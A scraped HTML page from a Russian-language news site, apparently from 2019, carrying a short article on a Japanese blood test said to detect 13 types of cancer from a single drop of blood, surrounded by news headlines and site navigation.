class="cls"></div><div class='cls'></div><span class='news_date'>25.11.2019 г.</span><br /><div class="post_news"> <span id="post-4783726"> <span class="postDate">23:35</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2511-uchyonye-razveyali-mif-o-polze-komnatnyx-rastenij">Учёные развеяли миф о пользе комнатных растений</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783724"> <span class="postDate">23:28</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/2511-polchishha-klopov-atakuyut-mir-shokiruyushhaya-statistika">Полчища клопов атакуют мир: шокирующая статистика</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783720"> <span class="postDate">22:26</span> <a class="postTitle" href="https://enovosty.com/news_sport/full/2511-vsemirnoe-antidopingovoe-agentstvo-rekomendovalo-otstranit-rossiyu-ot-uchastiya-v-dvux-olimpiadax">Всемирное антидопинговое агентство рекомендовало отстранить Россию от участия в двух олимпиадах</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783719"> <span class="postDate">21:59</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2511-ozhidaetsya-chto-hyundai-sonata-n-line-poluchit-tradicionnye-dlya-linejki-sportivnye-aksessuary-legkosplavnye-nizkoprofilnye-diski-originalnogo-dizajna-yarkie-tormoznye-supporta-agressivnye-bampe">Раскрыты характеристики новой Hyundai Sonata N-Line</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783718"> <span class="postDate">21:51</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2511-stalo-izvestno-chto-bylo-poxishheno-v-drezdenskom-muzee">Стало известно, что было похищено в дрезденском музее</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783715"> <span class="postDate">21:26</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2511-v-ukraine-bankam-zapretili-bez-suda-vzyskivat-s-lyudej-spornye-dolgi">В Украине банкам запретили без суда взыскивать с людей спорные долги</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783713"> <span class="postDate">21:16</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2511-v-ukraine-povysyat-tarify-na-elektroenergiyu-nazvana-prichina">В Украине повысят тарифы на электроэнергию: названа причина</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783710"> <span class="postDate">20:52</span> <a class="postTitle" href="https://enovosty.com/news_technology/full/2511-evropa-i-ssha-xotyat-vmeste-privezti-na-zemlyu-ostatki-zhizni-s-marsa">США и Европа хотят вместе привезти на Землю остатки жизни с Марса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783698"> <span class="postDate">20:44</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2511-reuters-evropejskie-policejskie-blokirovali-internet-resursy-igil">Reuters: Европейские полицейские блокировали интернет-ресурсы ИГИЛ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783696"> <span class="postDate">20:24</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2511-budem-otkrovenno-govorit-zelenskij-obeshhaet-ezhenedelnye-videootchety-v-socseti-o-rabote-vlasti">"Будем откровенно говорить": Зеленский обещает еженедельные видеоотчеты о работе власти</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783691"> <span class="postDate">20:19</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/2511-shest-kvartir-zemlya-na-rublevke-nedvizhimost-aliny-kabaevoj-ocenili-v-20-millionov">Шесть квартир, земля на Рублевке: недвижимость Алины Кабаевой оценили в $20 миллионов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783690"> <span class="postDate">19:48</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/2511-anonsirovan-reliz-grazhdanskoj-versii-bronevika-novator">Анонсирован релиз гражданской версии броневика "Новатор" (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783687"> <span class="postDate">19:24</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/2511-ivan-kompan-rasskazal-o-znachenii-uluchsheniya-rejtinga-agenstva-moodys-dlya-ukrainy">Иван Компан рассказал о значении улучшения рейтинга агенства Moody's для Украины</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783671"> <span class="postDate">19:07</span> <a class="postTitle" href="https://enovosty.com/news-markets/full/2511-smotryashhij-za-gask-ot-novoj-vlasti-kucher-zameshannyj-v-sxemax-s-mikitasem-xochet-zaxvatit-ukrbud-smi">Смотрящий за ГАСК от новой власти Кучер, замешанный в схемах с Микитасем, хочет захватить «Укрбуд» - СМИ</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4783677"> <span class="postDate">18:58</span> <a class="postTitle" href="https://enovosty.com/news_society/full/2511-v-kiev-pribyl-bort-s-tyazheloranenymi-na-donbasse-bojcami-vsu">В Киев прибыл борт с тяжелоранеными на Донбассе бойцами ВСУ</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4783776"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/zdorove/full/2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Японцы создали тест, позволяющий определить 13 видов рака по одной капле крови</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/zdorove">Здоровье</a> <span>&raquo;</span> Японцы создали тест, позволяющий определить 13 видов рака по одной капле крови</div><time datetime="2019-11-26T14:50:10+02:00"><span id="date">Здоровье, 14:50:10 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%AF%D0%BF%D0%BE%D0%BD%D1%86%D1%8B+%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BB%D0%B8+%D1%82%D0%B5%D1%81%D1%82%2C+%D0%BF%D0%BE%D0%B7%D0%B2%D0%BE%D0%BB%D1%8F%D1%8E%D1%89%D0%B8%D0%B9+%D0%BE%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B8%D1%82%D1%8C+13+%D0%B2%D0%B8%D0%B4%D0%BE%D0%B2+%D1%80%D0%B0%D0%BA%D0%B0+%D0%BF%D0%BE+%D0%BE%D0%B4%D0%BD%D0%BE%D0%B9+%D0%BA%D0%B0%D0%BF%D0%BB%D0%B5+%D0%BA%D1%80%D0%BE%D0%B2%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%AF%D0%BF%D0%BE%D0%BD%D1%86%D1%8B+%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BB%D0%B8+%D1%82%D0%B5%D1%81%D1%82%2C+%D0%BF%D0%BE%D0%B7%D0%B2%D0%BE%D0%BB%D1%8F%D1%8E%D1%89%D0%B8%D0%B9+%D0%BE%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B8%D1%82%D1%8C+13+%D0%B2%D0%B8%D0%B4%D0%BE%D0%B2+%D1%80%D0%B0%D0%BA%D0%B0+%D0%BF%D0%BE+%D0%BE%D0%B4%D0%BD%D0%BE%D0%B9+%D0%BA%D0%B0%D0%BF%D0%BB%D0%B5+%D0%BA%D1%80%D0%BE%D0%B2%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4783776" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><b><p>Японские исследователи создали уникальную методику, позволяющую в 99% случаев выявить онкологическую болезнь.</p></b> <div style="text-align:center;"><img width="460" height="307" src="https://enovosty.com/wp-content/uploads/2019/11/analys-460x307.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/11/analys.jpg 460w, https://enovosty.com/wp-content/uploads/2019/11/analys-112x75.jpg 112w, https://enovosty.com/wp-content/uploads/2019/11/analys-300x200.jpg 300w" sizes="(max-width: 460px) 100vw, 460px" /></div> <p>Благодаря новой японской методике можно будет определить 13 видов онкологии всего по одной капельке крови, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p>Новый способ диагностики был изобретен специалистами компании Toshiba, сотрудниками Научно-исследовательского института Национального онкоцентра, а также учеными Токийского медуниверситета. Метод базируется на нахождении ха<a class="tag" href="https://enovosty.com/tag/rak" target="_blank">рак</a>терных для онкологии частиц в крови человека.</p><p>Изобретатели сообщили, что с помощью их методики можно определить онкологию пищевода, легких, печени, желудка, желчного, поджелудочной, кишечника, простаты, яичников, мочевого пузыря и груди. Также возможно нахождение признаков саркомы и глиомы.</p><p>Ученые заявили, что уже в следующем 2020 году пройдут полномасштабные клинические испытания. В случае успеха в ближайшие годы данный диагностический метод будет внедрен в разных уголках планеты. </p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/zdorove/full/2311-pora-bit-trevogu-onkolog-nazval-opasnyj-simptom-strashnoj-bolezni" >Пора бить тревогу: Онколог назвал опасный симптом страшной болезни</a></p><p>Эксперты надеются, что когда-то такой способ онкодиагностики по капле крови станет элементом регулярных медосмотров в каждой стране.</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4783776"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4783776&amp;_wpnonce=bbfda23e14"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png"/> <meta itemprop="width" content="280"> <meta itemprop="height" content="55"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Катерина Лукьянчук" /></span><meta itemprop="datePublished" content="2019-11-26T14:50:10+02:00"/><meta itemprop="dateModified" content="2019-11-26T14:56:37+02:00"/><meta itemprop="genre" content="Здоровье"/><meta itemprop="description" content="Японские исследователи создали уникальную методику, позволяющую в 99% случаев выявить онкологическую болезнь."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/11/analys-460x307.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/11/analys-460x307.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="307"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Катерина Лукьянчук</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/krov" rel="tag">кровь</a>, <a href="https://enovosty.com/tag/rak" rel="tag">рак</a>, <a href="https://enovosty.com/tag/yaponcy" rel="tag">японцы</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 96</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%AF%D0%BF%D0%BE%D0%BD%D1%86%D1%8B+%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BB%D0%B8+%D1%82%D0%B5%D1%81%D1%82%2C+%D0%BF%D0%BE%D0%B7%D0%B2%D0%BE%D0%BB%D1%8F%D1%8E%D1%89%D0%B8%D0%B9+%D0%BE%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B8%D1%82%D1%8C+13+%D0%B2%D0%B8%D0%B4%D0%BE%D0%B2+%D1%80%D0%B0%D0%BA%D0%B0+%D0%BF%D0%BE+%D0%BE%D0%B4%D0%BD%D0%BE%D0%B9+%D0%BA%D0%B0%D0%BF%D0%BB%D0%B5+%D0%BA%D1%80%D0%BE%D0%B2%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%AF%D0%BF%D0%BE%D0%BD%D1%86%D1%8B+%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D0%BB%D0%B8+%D1%82%D0%B5%D1%81%D1%82%2C+%D0%BF%D0%BE%D0%B7%D0%B2%D0%BE%D0%BB%D1%8F%D1%8E%D1%89%D0%B8%D0%B9+%D0%BE%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B8%D1%82%D1%8C+13+%D0%B2%D0%B8%D0%B4%D0%BE%D0%B2+%D1%80%D0%B0%D0%BA%D0%B0+%D0%BF%D0%BE+%D0%BE%D0%B4%D0%BD%D0%BE%D0%B9+%D0%BA%D0%B0%D0%BF%D0%BB%D0%B5+%D0%BA%D1%80%D0%BE%D0%B2%D0%B8&url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fzdorove%2Ffull%2F2611-yaponcy-sozdali-test-pozvolyayushhij-opredelit-13-vidov-raka-po-odnoj-kaple-krovi"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4783776" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="8039a5a9e9" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4783647"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/politika/full/2511-itogi-dnya-i-istiraya-cel-krymskogo-mosta">Итоги дня: Смена настроений в Украине, удар по Пекину и истинная цель Крымского моста</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4783561"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/2511-prozrachnyj-rynok-zemli-prostimuliruet-ukrainskuyu-ekonomiku-prognoz-vsemirnogo-banka">Прозрачный рынок земли простимулирует украинскую экономику – прогноз Всемирного банка</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4783304"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/2211-kak-i-zachem-ze-vlast-namerena-dushit-svobodu-slova">Как и зачем Зе-власть намерена душить свободу слова</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4783294"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/finance/full/2211-10-tysyach-klientov-za-polgoda-leowallet-o-perspektivax-elektronnyx-koshelkov">10 тысяч клиентов за полгода: LeoWallet о перспективах электронных кошельков</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4782982"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/tehnologii/full/2011-texnologiya-budushhego-kogda-v-ukraine-poyavitsya-set-mobilnoj-svyazi-5g">Технология будущего: когда в Украине появится сеть мобильной связи 5G?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4782793"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1911-itogi-dnya-tyazhelovesy-politiki-na-trope-vojny-normandskij-kompromiss-i-gazovyj-sport">Итоги дня: Тяжеловесы политики на тропе войны, нормандский компромисс и газовый спор</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4782846"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1911-delo-bronezhiletov-marchenko-korrupciya-politicheskaya-rasprava-ili-borba-za-goszakupki">Дело «бронежилетов Марченко»: коррупция, политическая расправа или борьба за госзакупки?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4782826"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1911-privatizaciya-gospredpriyatij-kak-ne-poteryat-vazhnye-obekty">Приватизация госпредприятий: как не потерять важные объекты</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4782607"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1811-itogi-dnya-vozvrashhenie-korablej-vstrecha-putina-s-zelenskim-i-predlozhenie-gazproma">Итоги дня: Возвращение кораблей, встреча Путина с Зеленским и предложение "Газпрома"</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4782333"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1511-itogi-dnya-skandal-vokrug-slugi-naroda-vzryvy-v-balaklee-i-koshheeva-igla-trampa">Итоги дня: Скандал вокруг "Слуги народа", взрывы в Балаклее и кощеева игла Трампа</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/mir-video/full/2111-kitajskij-zoopark-pokazal-neobychnuyu-obezyanu-s-chelovecheskim-licom-video"><img width="142" height="88" alt="Китайский зоопарк показал необычную обезьяну с человеческим лицом" src="https://enovosty.com/wp-content/uploads/2019/11/img_top-e1574331760580.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/mir-video/full/2111-kitajskij-zoopark-pokazal-neobychnuyu-obezyanu-s-chelovecheskim-licom-video">Китайский зоопарк показал необычную обезьяну с человеческим лицом</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/2011-dubinskij-i-derkach-raskryli-korrupcionnuyu-sxemu-mirovogo-masshtaba-video"><img width="142" height="88" alt="Дубинский и Деркач раскрыли коррупционную схему мирового масштаба" src="https://enovosty.com/wp-content/uploads/2019/11/derkach.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/2011-dubinskij-i-derkach-raskryli-korrupcionnuyu-sxemu-mirovogo-masshtaba-video">Дубинский и Деркач раскрыли коррупционную схему мирового масштаба</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news-auto/full/2111-avtolyubitel-pokazal-neobychnye-sposoby-borby-s-zapotevaniem-stekol-video"><img width="142" height="88" alt="Автолюбитель показал необычные способы борьбы с запотеванием стекол" src="https://enovosty.com/wp-content/uploads/2019/11/11-1-e1574273201559.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-auto/full/2111-avtolyubitel-pokazal-neobychnye-sposoby-borby-s-zapotevaniem-stekol-video">Автолюбитель показал необычные способы борьбы с запотеванием стекол</a></div></td></tr><tr><td class="view"><span><i></i>8016</span></td><td class="view"><span><i></i>5782</span></td><td class="view last"><span><i></i>3826</span></td></tr><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/2111-oxotniki-za-sokrovishhami-osushili-12000-letnee-ozero-v-turcii-video"><img width="142" height="88" alt="Охотники за сокровищами осушили озеро в Турции, возраст которого 12 тысяч лет" src="https://enovosty.com/wp-content/uploads/2019/11/e075e8add8bdd2eacf7ac124a194138f.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/2111-oxotniki-za-sokrovishhami-osushili-12000-letnee-ozero-v-turcii-video">Охотники за сокровищами осушили озеро в Турции, возраст которого 12 тысяч лет</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/mir-video/full/2411-zataivshijsya-piton-za-sekundu-utashhil-olenya-v-vodoem-video"><img width="142" height="88" alt="Затаившийся питон за секунду утащил оленя в водоем" src="https://enovosty.com/wp-content/uploads/2019/11/olen-1.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/mir-video/full/2411-zataivshijsya-piton-za-sekundu-utashhil-olenya-v-vodoem-video">Затаившийся питон за секунду утащил оленя в водоем</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news_politics/full/1911-daniil-getmancev-gotov-sdat-druzej-korrupcionerov-bez-voznagrazhdeniya-video"><img width="142" height="88" alt="Даниил Гетманцев готов сдать друзей-коррупционеров без вознаграждения" src="https://enovosty.com/wp-content/uploads/2019/11/getmantsev.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/1911-daniil-getmancev-gotov-sdat-druzej-korrupcionerov-bez-voznagrazhdeniya-video">Даниил Гетманцев готов сдать друзей-коррупционеров без вознаграждения</a></div></td></tr><tr><td 